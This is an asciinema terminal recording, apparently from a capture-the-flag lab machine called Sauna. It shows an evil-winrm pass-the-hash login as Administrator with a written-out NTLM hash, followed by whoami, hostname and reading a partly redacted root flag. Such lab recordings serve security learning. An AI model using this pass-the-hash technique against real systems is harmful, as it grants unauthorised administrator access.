{"version": 2, "width": 211, "height": 27, "timestamp": 1595058105, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.054862, "o", "\u001b[1m\u001b[3m\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                                                                                  \r \r"]
[0.05524, "o", "\u001bk..achines/sauna\u001b\\"]
[0.059986, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36msauna\u001b[00m \u001b[K\u001b[?1h\u001b="]
[0.060023, "o", "\u001b[?2004h"]
[0.70399, "o", "asciinema rec"]
[0.872024, "o", "\u001b[13Devil-winrm -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175"]
[1.295844, "o", "\u001b[?1l\u001b>\u001b[?2004l"]
[1.296038, "o", "\r\r\n"]
[1.296271, "o", "\u001bkevil-winrm\u001b\\"]
[2.039717, "o", "\r\n\u001b[0;34mEvil-WinRM shell v2.3\u001b[0m\r\n\r\n"]
[2.039908, "o", "\u001b[0;34mInfo: Establishing connection to remote endpoint\u001b[0m\r\n\r\n"]
[19.403724, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[20.209156, "o", "w"]
[20.457055, "o", "h"]
[20.673124, "o", "o"]
[20.841151, "o", "a"]
[20.937119, "o", "m"]
[21.137199, "o", "i"]
[21.361205, "o", "\r\n"]
[22.605926, "o", "egotisticalbank\\administrator\r\n"]
[24.385169, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[24.969645, "o", "h"]
[25.361662, "o", "o"]
[25.753815, "o", "s"]
[26.009772, "o", "t"]
[26.39387, "o", "n"]
[26.521774, "o", "a"]
[26.633846, "o", "m"]
[26.76193, "o", "e"]
[26.921944, "o", "\r\n"]
[28.169781, "o", "SAUNA\r\n"]
[30.135733, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[31.226486, "o", "c"]
[31.338376, "o", "a"]
[31.482536, "o", "t"]
[31.706685, "o", " "]
[32.13869, "o", "."]
[32.282637, "o", "."]
[32.45856, "o", "/"]
[32.882603, "o", "D"]
[33.090849, "o", "e"]
[33.314739, "o", "s"]
[33.490813, "o", "k"]
[33.754916, "o", "t"]
[33.962806, "o", "o"]
[34.114826, "o", "p"]
[34.394898, "o", "/"]
[34.682902, "o", "r"]
[34.906897, "o", "o"]
[35.026966, "o", "o"]
[35.178985, "o", "t"]
[35.37102, "o", "."]
[36.995385, "o", "t"]
[37.123235, "o", "x"]
[37.219223, "o", "t"]
[37.563314, "o", "\r\n"]
[38.640932, "o", "f3---------------------------1f\r\n"]
[40.338774, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
